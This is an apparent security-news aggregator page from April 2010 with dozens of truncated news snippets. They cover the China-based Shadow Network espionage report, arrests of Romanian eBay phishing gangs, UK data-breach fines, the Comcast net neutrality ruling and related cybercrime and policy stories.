 Police in Romania have announced that they have arrested 70 people, breaking up three separate gangs involved in organised cybercrime in the process. The raids across the country followed an investigation by the Directorate for Investigating Organised Crime and Terrorism (DIICOT) which worked closely with the FBI in identifying over 800 victims of the gangs. Hundreds of officers were involved in the arrests, in collaboration with members of the US Secret Service based from the US Embassy in B... read more» 
   
 





 Cyber criminals target executives 
 (from mis-asia at 8-4-2010) 
 Mass indiscriminate computer attacks are giving way to highly targeted individual attempts in a new wave of professional cyber crime, experts say. Right now millions of computers are being targeted all over the world. At one point last week, home computers and telecommunications companies were the two user groups most under threat worldwide. In Australia alone, 2.95 million attacks have been detected, originating mainly from Canada, the US and China. According to Symantec, the maker of Norton... read more» 
   
 





 Telecom says XT restored in Nth Island 
 (from Tvnz at 8-4-2010) 
 Telecom says all XT issues affecting the top of the North Island are now restored and running as normal. Some XT customers in the north of the North Island, including Auckland, experienced intermittent problems on Thursday. The issues affected some cellsites linked to one of the Auckland-based RNCs. The two Christchurch-based RNCs, and the second Auckland-based RNC were unaffected. Telecom says it is still trying to work out what caused Thursday's outage.... read more» 
   
 





 Sophos Security Chet Chat episode 4 
 (from Sophos at 8-4-2010) 
 I am pleased to announce the publication of Sophos Security Chet Chat, Episode 4. We started this weekly podcast series a month ago and I am pleased that we have settled into a good rhythm and delivered all of the podcasts on schedule. The purpose of this series is to provide between 7 and 15 minutes of content on a weekly basis that draws your attention to the important security and privacy issues and threats of the past 7 days.... read more» 
   
 





 Visual artists sue Google over copyright issues 
 (from CNN at 8-4-2010) 
 Photographers and illustrators filed a lawsuit against Google today, claiming that the search engine displays copyrighted images in books it scans, without fairly compensating the people who created the images. The American Society of Media Photographers is leading the class-action lawsuit, which was filed today in U.S. District Court in New York, according to a news release. Visual artists were not allowed to join a previous lawsuit filed against Google by book authors and publishers, who... read more» 
   
 





 Judge in Sarah Palin e-mail hacking case denies motion challenging computer search 
 (from Computer World at 8-4-2010) 
 FBI agents did not violate alleged hacker David Kernell's Fourth Amendment rights when they searched through the entire contents of his computer in connection with their investigation, a federal magistrate judge ruled this week in the Sarah Palin e-mail hacking case. In a 41-page ruling this week, Judge Clifford Shirley in Knoxville denied Kernell's motions to quash the information gathered from those searches and said that no unreasonable search or seizure had taken place, as Kernell had cla... read more» 
   
 





 Biometrics Briefing paper - makes you blink? 
 (from hostexploit at 8-4-2010) 
 Some key findings of the recent ENISA briefing paper include: - They are most useful when you are using more than one type of biometric at the same time, and as a complement to more robust methods -Some behavioural biometrics, require specialised and sometimes highly obtrusive equipment which may be off-putting to users. - Other behavioural biometrics offer a completely unobtrusive technique to identify or classify individuals. -Such unobtrusiveness may be challenging from the point ... read more» 
   
 





 Internet hackers make a Twit out of red-faced Boyle 
 (from Independent at 8-4-2010) 
 GREEN Party Senator Dan Boyle has become a victim of internet hackers who took over his celebrated Twitter account. The junior coalition party chairman's online messaging infamously kickstarted the Greens dramatic U-turn on former Defence Minister Willie O'Dea. Just hours after the Greens' six TDs voted to back Mr O'Dea two months ago, Mr Boyle told the world via Twitter that he didn't have confidence in him.... read more» 
   
 





 Schmidt: Private Sector Key to Stopping Google-style Attacks 
 (from Computer World at 8-4-2010) 
 White House Cybersecurity Coordinator Howard Schmidt says the information security community is right to be spooked by massive, coordinated attacks that recently targeted Google. But he rejects the notion that this is cybergeddon, and believes the best defense remains in the hands of the private sector. Schmidt was at CSO Perspectives to deliver a keynote talk on the changing face of cybersecurity and update attendees on the government's Comprehensive National Cybersecurity Initiative (CNCI).... read more» 
   
 





 Hackers: not just geeks, but activists 
 (from The Star at 8-4-2010) 
 The word “hacker” conjures up a vision of a geek in a basement, snickering diabolically as he steals identities or credit card numbers. But, as Tuesday’s news out of U of T shows, sometimes hackers are good guys. Members of the university’s Citizen Lab cracked the Shadow Network, a Chinese-based espionage ring that had been pilfering sensitive international information, including visa applications Canadians submitted to the Indian government.... read more» 
   
 





 Internode finds bug in Ericsson DSLAMs 
 (from SecureComputing at 8-4-2010) 
 ISP Internode has discovered a software flaw that has crippled some of the Ericsson-branded Ethernet controller nodes (ECNs) on its network - a flaw that may lie dormant within the networks of other service providers. Internode's managing director Simon Hackett posted a lengthy technical explanation of the issue late last week, which had caused broadband service issues in some exchanges in South Australia. Hackett said the fault had been "traced to a software bug in one of the multiple sof... read more» 
   
 





 Breaches in the past could be more damaging 
 (from India Times at 8-4-2010) 
 This was revealed by the Canadian group that first uncovered the existence of a global espionage network GhostNet in 2009. Breaches and exfiltration of documents and even constant snooping through cyber networks that happened in the past could potentially be more damaging. They accessed encrypted diplomatic communication , confidential documents related to India’s relations with and activities in regions such as West Africa, Russia and the CIS states. They exfiltrated secret assessments of I... read more» 
   
 





 White Paper - HIPAA and HITECH Act Essentials for Healthcare Executives 
 (from BitPipe at 7-4-2010) 
 Many years ago, the Health Insurance Portability and Accountability Act (HIPAA) promised to overhaul the healthcare industry by, in part, mandating protective measures on sensitive healthcare records. The HIPAA Privacy and Security Rules ended up not having the impact many expected. Years after both rules took effect, data breaches are still occurring. This era may soon come to an end. The Health Information Technology for Economic and Clinical Health Act (a.k.a. HITECH Act) – which officially t... read more» 
   
 





 Hacking, a growing menace in china (symc, ibm, goog, yhoo) 
 (from benzinga at 7-4-2010) 
 According to a report by the Financial Times, with 400 million people, China has the biggest population of internet users. Probably the country also has the world’s biggest population of hackers. According to a report by Message labs, a research arm of Symantec (NASDAQ: SYMC), last month, China became the biggest source of targeted hacking attacks. Eagle Wan, a veteran Chinese hacker now working for IBM (NYSE: IBM), says, ‘’there are no more than 1000 people in China who are capable of produc... read more» 
   
 





 Webcast - All Things Cyber: What's Next for the Cyber Enterprise? 
 (from defense systems at 7-4-2010) 
 Today’s cyber landscape is rapidly evolving and expanding. The modern enterprise manager must incorporate all aspects of the enterprise when developing policy, defining and updating business processes, and performing risk assessments before taking action. The warfighter adds yet another dimension of complexity as the New Cyber Domain is now integrated across all mission elements. Effective cyber Solutions today will blend mission, people, process and technology. Join our webcast to learn: ... read more» 
   
 





 Could a single hacker crash a country's network? 
 (from howstuffworks at 7-4-2010) 
 You know you're living in the new millennium when one of the Obama administration's newest positions is nicknamed the "cyberczar." In May 2009, President Obama formally announced his plans to appoint a national cybersecurity adviser, charged with protecting computer networks in the United States -- which Obama referred to as "strategic national assets" -- from hacking and spying. Cybersecurity isn't a new topic making the rounds in Washington. In 2007, the Commission on Cybersecurity for the ... read more» 
   
 





 Potential Risk to Blood Supply Probed 
 (from WSJ at 7-4-2010) 
 An infectious virus linked to two diseases is drawing the attention of public-health officials, who are investigating the potential threat to the nation's blood supply. It isn't clear if the virus, known as XMRV, poses a danger, and public-health officials say there isn't evidence of spreading infection. But because of concern over the potential for widespread infection and preliminary evidence that XMRV is transmitted similarly to HIV, officials are quickly trying to determine if action is n... read more» 
   
 





 Feds Add 4 More Major Breaches to List 
 (from healthcareinfosecurity at 7-4-2010) 
 Federal regulators have added four more breaches to the tally of major healthcare incidents, with 56 cases now reported since September 2009, when new federal reporting requirements kicked in. Since Feb. 22, the Office for Civil Rights within the U.S. Department of Health and Human Services has been regularly updating on its Web site a list of organizations that have notified HHS about a breach of unsecured health information involving more than 500 individuals.... read more» 
   
 





 Take lead on cyber crime, Ottawa told 
 (from nationalpost at 7-4-2010) 
 Researchers in Canada who cracked a major international cyber espionage ring are calling on the federal government to take a leading international role in combatting online crime. The attackers -- largely based in Chengdu, China -- used such popular tools as Twitter, blog posts and email accounts to gain control of computers and steal more than 700 high-level political documents, including confidential files about a missile system from India's national security establishment; Canadian visa ap... read more» 
   
 





 Coral Springs teen jailed on child pxxxgraphy charges 
 (from Sun-sentinel at 7-4-2010) 
 Authorities on Tuesday charged a Coral Springs teenager with 25 counts of possession of child pornography. Brandon Morgan, 18, was being held late Tuesday at the Broward County Main Jail on $10,000 bond. Investigators with the Attorney General's CyberCrime Unit said they found the images on the Internet during a routine investigation and traced the images back to Morgan's computer. Investigators seized three computers, several digital cameras and a disposable camera from Morgan's home dur... read more» 
   
 





 Security 'only skin deep' in Indian IT-BPO 
 (from DNAIndia at 7-4-2010) 
 Domestic IT and BPO service providers are yet to grasp the basic spirit behind data security even as their overseas clients worry more and more about terror strikes in India, according to a survey of Indian firms and their overseas clients. The survey, conducted by Forrester Research, found that Indian companies were confusing gadgets and technology for the real need — a culture of security. “Most vendor initiatives are merely gestures or marketing activities rather than genuine efforts at... read more» 
   
 





 DEB: Costs Consultation 
 (from webmedia at 7-4-2010) 
 The Government has published a consultation on how the costs of the notification obligations under the Digital Economy Bill should be shared out between Rights-holders, ISPs and subscribers. Responses are required by May 25th. (And no, you haven’t missed anything. It still is a Bill, not an Act, though consulting on its implementation does seems to presume that something pretty like the current text will be passed before the General Election on May 6th). Three groups of costs are identifie... read more» 
   
 





 Javelin report: ATM attacks growing in sophistication 
 (from TechTarget at 7-4-2010) 
 ATM attacks have shifted from basic skimming into attacks on ATM software and ATM networks, fraudulent mobile alerts, and account takeover via stolen information and call centers, according to a report released Tuesday by Javelin Strategy & Research. Traditional skimming is being replaced by more sophisticated attacks as criminals have become more organized and global, said Robert Vamosi, analyst at the Pleasanton, Calif.-based research firm and author of the report. "Now what we're seeing is... read more» 
   
 





 Is the U.S. the nation most vulnerable to cyberattack? 
 (from NetworkWorld at 7-4-2010) 
 Although the United States likely has the best cyberwar capabilities in the world, "that offensive prowess cannot make up for the weaknesses in our defensive position," one-time presidential advisor Richard Clarke argues in his forthcoming book Cyber War. Clarke -- who served as special advisor to the president for cybersecurity in 2001 and now teaches at Harvard's Kennedy School for Government and works at Good Harbor Consulting -- fears that any outbreak of cyber warfare would spill over in... read more» 
   
 





 Symantec urges business to bolster defences in order to avoid new £500k fines for breaches of Data Protection Act 
 (from viewfromthebunker at 7-4-2010) 
 As new legislation comes into force today which empowers the Information Commissioner’s Office (ICO) to levy fines on businesses of up to £500,000 for serious breaches of the Data Protection Act (DPA), Symantec has cautioned that fines are avoidable – provided adequate security best practice is adhered to. The ICO is aiming to give the data protection act ‘teeth’ and is clearly concerned about several high profile cases where unencrypted, confidential data residing on laptops and USB sticks h... read more» 
   
 





 Euthanasia group teaches seniors to hack Aussie filter 
 (from ComputerWorld at 7-4-2010) 
 Pro-euthanasia group Exit International is holding national hacking crash-courses in how to bypass the Federal Government's planned ISP-level Internet content filter with help from the Australian Pirate Party. The first of eight "Hacking Masterclasses" was held in Chatswood NSW on Thursday last week, and drew about 50 elderly people — some bearing laptops. Exit International director and controversial Australian physician, Philip Nitschke, created the class to help the elderly access euthanas... read more» 
   
 





 Half a million pound fines for data breaches from today 
 (from ComputerWorldUk at 7-4-2010) 
 The Information Commissioner will be able to issue fines of up to half a million pounds to businesses that break the Data Protection Act, from today (April 6). The Information Commissioner’s Office (ICO) was first granted the power to issue the large penalty in January. The announcement also marks the first time the ICO has been able to issue fines. Christopher Graham, the Information Commissioner, said: “These penalties are designed to act as a deterrent and to promote compliance with the... read more» 
   
 





 Many cloud computing customers 'lack security' 
 (from globalgold at 7-4-2010) 
 The majority of firms opting for cloud computing technology and services have inadequate security procedures in place, it has been claimed. Citing recent research conducted by Symantec and the Ponemon Institute, Justin Somaini, the former's chief information security officer, said that efficiency savings offered by cloud computing have driven the technology's uptake. However, he noted that while many firms are taking the plunge and opting for managed hosting services, the majority are fail... read more» 
   
 





 Companies should not use free security testing tools exclusively 
 (from zdnetasia at 7-4-2010) 
 Some businesses are using free security tools as part of their testing processes, but few, if any, are relying solely on open market software, according to industry watchers. The use of such free tools in an enterprise environment may be a good sign since most that do would otherwise not have conducted any form of security checks, Graham Titterington, principal analyst at Ovum, said in an e-mail. He noted that testing is still not a common practice in software development. Gerry Chng, Asea... read more» 
   
 





 More organisations adopt secure coding practices 
 (from ComputerWeekly at 7-4-2010) 
 Organisations are adopting secure programming practices, a report from Errata Security has found. In the survey of 46 software developers, 86% of the participants said their organisation had sent one or more members of the software development team to security training in a recent or current cycle. However, only eight out of 46 participants said that their organisation sent upper management level employees to training. The survey showed that the most popular form of security testing was st... read more» 
   
 





 Cyberattack: U.S. Unready For Future Face Of War 
 (from NPR at 7-4-2010) 
 For the United States, the prospect is especially worrisome. The entire U.S. economy depends on operations in cyberspace. If computer networks shut down, so will the country. Indeed, in a major cyberwar scenario, the United States would be uniquely vulnerable. No military is more dependent on data networking. Unmanned aircraft send video feeds back to Earth 24/7, while soldiers on the ground are guided by GPS signals and linked via computers to other units and command posts. "In the first ... read more» 
   
 





 China hackers 'stole' N-E, Naxal data 
 (from Indian Express at 7-4-2010) 
 A year after Indian embassies across the world were compromised by a China-based cyber espionage network, investigators have uncovered the extent of the spy ring, revealing that computers in the National Security Council Secretariat (NSCS) were infected, giving the hackers access to confidential documents on the security assessment of Northeastern states and Naxalite movement, besides information on missile defence systems and military equipment. More than 35 sensitive computers belonging to ... read more» 
   
 





 'Alien invasion' April Fools' story angers Jordan mayor 
 (from BBC at 7-4-2010) 
 A Jordanian mayor is considering suing a newspaper over an April Fools' Day report saying aliens had landed nearby. Al-Ghad's front-page story on 1 April said flying saucers flown by 3m (10ft) creatures had landed in the desert town of Jafr, in eastern Jordan. It said communication networks went down and frightened townspeople fled into the streets.... read more» 
   
 





 Boeing, U.S. Government Step Up Recruitment for ‘Cyberwarriors’ 
 (from Bloomberg at 7-4-2010) 
 Kyle Osborn makes a convincing technical support representative. After just a few phone calls, he’s able to persuade the other party to download malicious software. Osborn’s ruse won’t undermine security of any actual computer networks. He’s working the phones during a mock hacking competition at California State Polytechnic University in Pomona, California. The late-March event is one of a growing number of challenges aimed at helping the government and corporations including Boeing Co. find... read more» 
   
 





 Infosec 2010: Businesses can do more to stay out of court for data breaches, says top UK lawyer 
 (from ComputerWeekly at 7-4-2010) 
 Data breaches are fast becoming one of the biggest reasons that businesses could find themselves in court as the government tightens up data protection legislation. The reality is that no matter how much data protection policy and technology organisations have, they could still easily find themselves having to answer in court for a data breach. In data breach cases, the most damning evidence often comes from whistle blowers within the organisation keen to protect themselves from blame.... read more» 
   
 





 China-Based Hackers May Have Used Twitter, Google to Attack Dalai Lama, UN 
 (from Mashable at 7-4-2010) 
 A group of researchers has linked a huge, China-based cyber espionage ring to the theft of thousands of documents — including classified information, visa applications, and personal identities — from “politically sensitive targets” around the world. The command-and-control infrastructure of this so-called Shadow Network used platforms such as Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo Mail to maintain persistent control of infected computers. They also used Tor, a syste... read more» 
   
 





 India was aware of hacking threat 
 (from India Times at 7-4-2010) 
 Last week, Indian cyber security officials were in Toronto to meet the researchers from Munk School of Global Affairs whose year-long project, `Shadows in the Cloud', tracked cyber espionage attempts against computers and servers in some 31 countries, but overwhelmingly in India, including the national security and defence establishments. Other "entities of interest", according to the report, included The Times of India. Over the past few months, after the first reports of a China-based netwo... read more» 
   
 





 China refutes hacking allegation 
 (from China at 7-4-2010) 
 China on Tuesday refuted a claim that Chengdu-based hackers stole information from the Indian Defense Ministry. "China firmly opposes any kind of cyber crime, including cyber attacks. The cyber attack is an international issue requiring the cooperation and joint efforts of the international community," Foreign Ministry spokesperson Jiang Yu told a press conference. A group of researchers at the Munk Centre for International Studies at the University of Toronto claimed that a cyber-espionag... read more» 
   
 





 Beijing denies hacking websites 
 (from godubai at 7-4-2010) 
 China on Tuesday dismissed reports that Chinese hackers have broken into top secret files of the Indian Defence Ministry and embassies around the world, saying that it was firmly opposed to hacking and regards it as an international crime. "We have been hearing frequently these kind of news and I do not know the purpose to stir up issues," Chinese Foreign Ministry spokesperson Jiang Yu said, replying to questions about reports of hacking of sensitive Indian sites in the media on Tuesday.... read more» 
   
 





 Hackers not linked to China's government: researcher 
 (from Yahoo at 7-4-2010) 
 China-based hackers who stole data on India's missile systems, private correspondence of the Dalai Lama and Canadian visa applications appear not to be linked to the Chinese government, Canadian researchers say. "I dont doubt that some of the sensitive information that was acquired might eventually find its way to elements within the Chinese government that may find it useful," said Nart Villeneuve, one of the University of Toronto researchers who took part in the investigation that uncovered... read more» 
   
 





 ICO powers will create data security focus, says expert 
 (from ihotdesk at 7-4-2010) 
 The powers available to the Information Commissioner's Office (ICO) were extended to make firms more attentive to data security, IT services users have heard. From today, the ICO will be able to issue fines of up to £500,000 to companies which have committed a "deliberate or negligent" breach of personal data protection. Commenting on the development, Network Box internet security analyst Simon Heron said a number of high-profile data breaches have caught the public's attention in the past... read more» 
   
 





 Web Probes On Defense Contractors Rising 
 (from Information Week at 7-4-2010) 
 Internet-based attempts to steal U.S. military technology via defense contractors are on the rise, according to an annual Department of Defense analysis of data supplied by the defense industry. Not only are network probes and intrusions on the increase, the Department of Defense said in the report, which it released late last month, but so are "bold and overt" requests for information made via e-mail and even social networks. Information systems are the most-heavily targeted of military ... read more» 
   
 





 Cyberattack Looming, Federal IT Pros Believe 
 (from Information Week at 7-4-2010) 
 A majority of federal IT professionals believe the U.S. is at risk for a major cyberattack, one against which the country is not adequately prepared to defend itself, according to a recent survey. Security vendor Lumension surveyed 201 IT professionals -- from the executive level to operations -- between Feb. 18 to 26, and found that 61 percent of them believe the potential in the next year for a cyberattack against critical IT infrastructure from a foreign nation is "high." Moreover, 42 ... read more» 
   
 





 Vietnam dismisses Google hacking claims 
 (from BBC at 7-4-2010) 
 Vietnam has rejected accusations made by Google and McAfee that malicious software had been used to spy on tens of thousands of Vietnamese web users. The companies said the software had been used to target anti-government blogs and websites. McAfee said the perpetrators of the attacks "may have some allegiance" to the country's government.... read more» 
   
 





 Vietnam Rejects Google Claims Of Cybercrime 
 (from IT Proportal at 7-4-2010) 
 The government of Vietnam has refused to acknowledge the 'groundless' accusations made by Google's Neel Mehta and McAfee Chief Technical Officer George Kurtz. They had both hinted that the government was involved in cyber attacks on blogs and websites belonging to protesters of a controversial mining project in the country. The blog post made by Neel Mehta, who is a member of Google's security team, suggested that the Vietnamese government had used a malware, in the form a Vietnamese langu... read more» 
   
 





 Update: Researchers track cyber-espionage ring to China 
 (from ComputerWorld at 7-4-2010) 
 Researchers in the U.S. and Canada have tracked and documented a sophisticated cyber-espionage network based in China, dubbed Shadow, that targeted computers in several countries, including systems belonging to the Indian government and military. The Shadow network of compromised computers was detailed in a report released Tuesday by the Information Warfare Monitor -- a project involving researchers at the University of Toronto's Munk Center for International Studies and The SecDev Group -- a... read more» 
   
 





 Report: China-based hackers stole India secrets 
 (from Yahoo at 7-4-2010) 
 China-based hackers stole Indian national security information, 1,500 e-mails from the Dalai Lama's office and other sensitive documents, a new report said Tuesday. Researchers at the University of Toronto said they were able to observe the hacking and trace it to core servers located in China and to people based in the southwestern city of Chengdu. The researchers said they monitored the hacking for the past eight months. The report said it has no evidence of involvement by the Chinese go... read more» 
   
 





 70 Romanian Phishers & Fraudsters Arrested 
 (from garwarner at 7-4-2010) 
 On March 4th, FBI Director Robert Mueller was given a speech on Cybercrime to the RSA conference where he mentioned that: And we have worked with the Romanian National Police to arrest more than 100 Romanian nationals in the past 18 months. Four years ago, several American companies threatened to cut cyber ties with Romania because of the rampant hacking originating from that country. And yet today, Romania is one of our strongest partners.... read more» 
   
 





 China denies hacking Indian Defence Ministry computers 
 (from calcuttanews at 7-4-2010) 
 China has denied that Chengdu-based hackers stole information from the Indian Defence Ministry. A group of researchers at the Munk Centre for International Studies at the University of Toronto claimed that a cyber-espionage group based in southwest China stole documents from the Indian Defence Ministry and emails from the Dalai Lama's office. The hackers allegedly stole classified reports about security in several Indian states, and about several Indian missile systems. "China firmly op... read more» 
   
 





 Researchers says China-based hackers stole India security information, Dalai Lama e-mails 
 (from StarTribune at 7-4-2010) 
 China-based hackers stole Indian national security information, 1,500 e-mails from the Dalai Lama's office and other sensitive documents, a new report said Tuesday. Researchers at the University of Toronto said they were able to observe the hacking and trace it to core servers located in China and to people based in the southwestern city of Chengdu. The researchers said they monitored the hacking for the past eight months. The report said it has no evidence of involvement by the Chinese go... read more» 
   
 





 Data Stolen From India, UN, Dalai Lama Traced To China 
 (from Information Week at 7-4-2010) 
 Just as in January, computer hackers based in China are being accused of cyber espionage and the Chinese government is denying involvement and calling the charges groundless. In January, the targets were Google, dozens of other companies, and the e-mail accounts of human rights activists. Following revelations about the incident, Google said it would stop censoring search results in China, a decision that led the company recently to redirect queries from mainland China to Google servers in Ho... read more» 
   
 





 Report: India targeted by spy network 
 (from CNet at 7-4-2010) 
 Researchers have uncovered a spy network that stole classified and other sensitive documents from the Indian government, the Dalai Lama's office, the United Nations, and compromised computers elsewhere, according to a report released on Tuesday. The operation, dubbed "Shadow Network," is detailed in a report that also cites evidence it says links the Shadow network to two people living in Chengdu, China, and the underground hacking community in that country.... read more» 
   
 





 Chinese spy ring targeted Indian government 
 (from ComputerWorldUk at 7-4-2010) 
 Researchers in the US and Canada have tracked and documented a sophisticated cyber-espionage network based in China, dubbed Shadow, that targeted computers in several countries, including systems belonging to the Indian government and military. The Shadow network of compromised computers was detailed in a report released by the Information Warfare Monitor - a project involving researchers at the University of Toronto's Munk Center for International Studies and The SecDev Group - and the Shado... read more» 
   
 





 Simplifying Organisational Security and Achieving PCI Compliance 
 (from Linkedin at 7-4-2010) 
 Computime Ltd would like to invite you to a half-day specialized security seminar which is being held at the San Gorg Corinthia in St George’s Bay on Wednesday 14th April. The seminar is aimed to help you: 1) Automate and Patrol Your Organisation’s Security Learn about the latest solutions in Security and Event Management from LogRhythm, a company which provides enterprise-class Log Management and SIEM 2.0 solutions that empower organizations to comply with regulations, secure their networ... read more» 
   
 





 CSO Interchange London - May 10th, 2010 - Forum: 8:00 a.m. - 2:00 p.m. 
 (from csointerchange at 7-4-2010) 
 Leading enterprise security executives and industry experts will discuss timely topics at the upcoming CSO Interchange Forum London. CSO Interchange uses an interactive format and roundtable sessions where small groups of senior security executives can discuss topics and exchange ideas. The CSO Interchange concludes with a lunch buffet reception.... read more» 
   
 





 Police cuff 70 eBay fraud suspects 
 (from The Register at 7-4-2010) 
 Romanian police have arrested 70 suspected cybercrooks, thought to be members of three gangs which allegedly used compromised eBay accounts to run scams. The alleged fraudsters obtained login credentials using phishing scams before using these trusted profiles to tout auctions for non-existent luxury goods (luxury cars, Rolex watches and even a recreational aircraft). Buyers handed over the loot but never received any goods in return. The 800 victims of the scam are estimated to have suffe... read more» 
   
 





 Detecting Malicious Insiders Before Data Breaches Damage Your Business 
 (from EWeek at 7-4-2010) 
 Data breaches carried out by malicious insiders may be uncommon, but the damage they wreak can be catastrophic if detected too late. Enterprises need to take an active approach to dealing with the problem, which means understanding who the malicious insiders are, what drives them and how that should influence security policy.... read more» 
   
 





 The Many Paths to Security Awareness 
 (from Internet Storm Center at 7-4-2010) 
 Promoting Security Awareness is an ongoing challenge in our field. Without a good understanding of Security Awareness and issues, getting appreciation at the senior management level for security issues is a real problem. Security Awareness is critical in influencing business decisions to include (and hopefully fund) security components into every project, protecting the corporate assets from both theft and lawsuits. However, Security Awareness does not mean the same thing to everyone in a ... read more» 
   
 





 Five things you need to tell your parents about computer security 
 (from NetworkWorld at 7-4-2010) 
 Ever get that tech support call from your parents saying, "My computer is slow all of a sudden" or "I have all sorts of weird things popping up on my screen"? You then troubleshoot the problems only to find out that malware, spyware, viruses or other such nastiness is the culprit. To be sure you eradicate all the bugs you resort to a full format and reinstall of everything thus taking you hours. If you've been there, done that here are five basic security tips to provide to your parents that, if... read more» 
   
 





 But How Could Wikileaks Break A Story Without Traditional Newspaper Backing? 
 (from Techdirt at 7-4-2010) 
 By now you've likely seen the rather horrifying Collateral Murder website, put together from the video leaked to Wikileaks (for which, apparently, US intelligence officials investigated some of the Wikileaks folks). While there's a lot of ongoing back-and-forth over what the video really shows, there's no doubt that the release of the video is a journalistic scoop. And yet, we keep being told that if newspapers fail, no one will be left to do investigative journalism? So what were the traditi... read more» 
   
 





 Blunder reveals Gordon Brown's email address 
 (from TechWorld at 7-4-2010) 
 With the UK election campaign barely hours old, a government official has gaffed by revealing the private email addresses of many senior politicians to journalists.The data accident happened in an email sent out without using the BCC (blind courtesy copy) feature to lobby journalists, giving the Downing Street official's contact details for use during the forthcoming campaign. The email embedded the full address list in open text, which made public email contacts for an unnamed but long list ... read more» 
   
 





 SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0 
 (from Scribd at 7-4-2010) 
 The researchers at InfoWar Monitor and Shadow Server have released a great research paper that adds to the Ghostnet report from last year. To view the research paper click the link below : http://www.scribd.com/doc/29435784/SHADOWS-IN-THE-CLOUD-Investigating-Cyber-Espionage-2-0... read more» 
   
 





 Hackers: not just geeks, but activists 
 (from TheStar at 7-4-2010) 
 The word “hacker” conjures up a vision of a geek in a basement, snickering diabolically as he steals identities or credit card numbers. But, as Tuesday’s news out of U of T shows, sometimes hackers are good guys. Members of the university’s Citizen Lab cracked the Shadow Network, a Chinese-based espionage ring that had been pilfering sensitive international information, including visa applications Canadians submitted to the Indian government. So if hackers aren’t inherently criminals, what... read more» 
   
 





 The FreeMalaysiaToday news website has been the target of a consistent DDOS attack 
 (from freehacking at 7-4-2010) 
 The FreeMalaysiaToday news website has been facing severe technical glitches, leading to a disruption in services. The fledgling independent news website has been the target of a consistent “Distributed Denial of Service or DDOS” attack. FMT's head of information technology N Thirun said that measures are being put in place to address this issue. “It is a very intelligent and planned attack. Previously, they were just teasing us but the situation has now become serious. Yesterday, we ca... read more» 
   
 





 Public sector opportunities in the cloud 
 (from ChannelWeb at 7-4-2010) 
 The public sector remains an appealing market, as billions are still spent each year on goods and services essential to the delivery of public services. The answer could come in the form of cloud and mobile technology. The cost-saving potential of moving traditional on-premise applications to the cloud is well documented. The cloud can also improve application accessibility for people who are not always office-based, as well as enhance communications.... read more» 
   
 





 Pirated software is fine, say one in three Brits 
 (from v3 at 7-4-2010) 
 A third of UK citizens believe that it is acceptable to use pirated software at home or at work, according to a new survey conducted by Microsoft. The poll of 1,000 people showed that pirated software is nearly as popular in the workplace as it is at home. Microsoft said that the trend is alarming because chunks of its revenue are lost each year to pirated software.One in eight employed adults surveyed admitted using pirated software at work, aligning with the fact that 57 per cent of respond... read more» 
   
 





 Google targets teens with Buzz safety campaign 
 (from v3 at 7-4-2010) 
 Google has posted a new video instructing users on how to safely manage their Buzz accounts. The company said that the video will target teenage users in particular. The YouTube video was posted through the company's Safety Channel, a YouTube feed dedicated to helping younger users stay safe online. However, the video provides a number of tips for users on how to manage their personal information and control who is able to view their Buzz account information. "We created Google Buzz to make ... read more» 
   
 





 The death of Net neutrality: Five quick thoughts 
 (from ZDNet at 7-4-2010) 
 Today, a federal appeals court rejected the FCC’s claim that Comcast couldn’t “sculpt” Internet traffic and block the flow of BitTorrent data. This effectively put a stake in the heart of Net neutrality. It sets a precedent for all such cases, and, in effect, allows Internet carriers of all types to adjust their traffic in any way they wish. This is bad news for all of us online. Here are five quick thoughts: #1 Killing Net neutrality means big players always win : There could come a time w... read more» 
   
 





 Aussie pleads not guilty to luring Canadian teen over net 
 (from The Sydney Morning Herald at 7-4-2010) 
 An Australian man accused of using the internet to lure a 14-year-old Canadian girl before sexually assaulting her has pleaded not guilty to the charges. Anthony John Porter, a 37-year-old from Woody Point in Queensland, was arrested in Corner Brook, a city in the Canadian province of Newfoundland, last week after local authorities received a complaint from the public of inappropriate conduct....read more» 
   
 





 China denies Canadian hacker claims 
 (from Yahoo News at 7-4-2010) 
 China on Tuesday denied that hackers based in the country targeted Indian government computers and accessed military secrets, weeks after Google effectively shut its China search engine over cyberattacks. The denial came after Canadian researchers claimed that a China-based online spying network leveraged popular Web services such as Twitter, Google Groups and Yahoo! Mail to steal information from the New Delhi government and other Indian networks.... read more» 
   
 





 Cyber Insecurity: U.S. Struggles To Confront Threat 
 (from NPR at 7-4-2010) 
 Americans do not often hear that someone has found a way to overcome U.S. defenses, but military and intelligence officials have been sounding downright alarmist lately with their warnings that the country is ill-prepared to deal with a cyberattack. Director of National Intelligence Dennis Blair opened his annual survey of security threats in February by advising Congress that "malicious cyberactivity is growing at an unprecedented rate," and that the country's efforts to defend against cyber... read more» 
   
 





 Web filter splits opposition 
 (from The Age - Australia at 7-4-2010) 
 The federal opposition is yet to formulate a position on the proposed internet filter despite Labor flagging its intention to introduce the measure before the last election. The failure of Coalition leader Tony Abbott or his communications spokesman Tony Smith to indicate whether they would support the bill reflects divisions within the party about the government's plan to block access to internet sites banned under Australia's classification rules.... read more» 
   
 





 Business-savvy cybercriminals work to improve their image 
 (from ZDNet at 7-4-2010) 
 Despite the dubious success of botnets such as Zeus, which has infected thousands of machines around the world, the authors of malware apparently have plenty of business issues to worry about to earn a dishonest crust. Zeus, described as the world's largest botnet, delivers a banking Trojan that sends data back to those in control of the network. Like other cybercriminals, the creators of Zeus have taken several leaves from the book of legitimate commercial software, including the concept of off... read more» 
   
 





 Court rules against US FCC's Comcast net neutrality decision 
 (from Computer World at 7-4-2010) 
 A U.S. appeals court has ruled that the U.S. Federal Communications Commission did not have the authority to order Comcast to stop throttling peer-to-peer traffic in the name of network management. The U.S. Court of Appeals for the District of Columbia Circuit, in an order Tuesday, overturned the FCC's August 2008 ruling forcing Comcast to abandon its network management efforts aimed at users of the BitTorrent P-to-P (peer-to-peer) service and other applications. The FCC lacked "any statutori... read more» 
   
 





 Spy Network Pilfered Classified Docs From Indian Government and Others 
 (from Wired at 7-4-2010) 
 A spy network targeting government networks in India and other countries has been pilfering highly classified and other sensitive documents related to missile systems, the movement of military forces and relations among countries, according to a report released Tuesday. It also grabbed nearly a year’s worth of personal correspondence from the Dalai Lama’s office, even after reports published last year indicated that the Dalai Lama’s network had been compromised in what is believed to be a sep... read more» 
   
 





 Recommended Reading: Shadows in the Cloud 
 (from politicalhacking at 7-4-2010) 
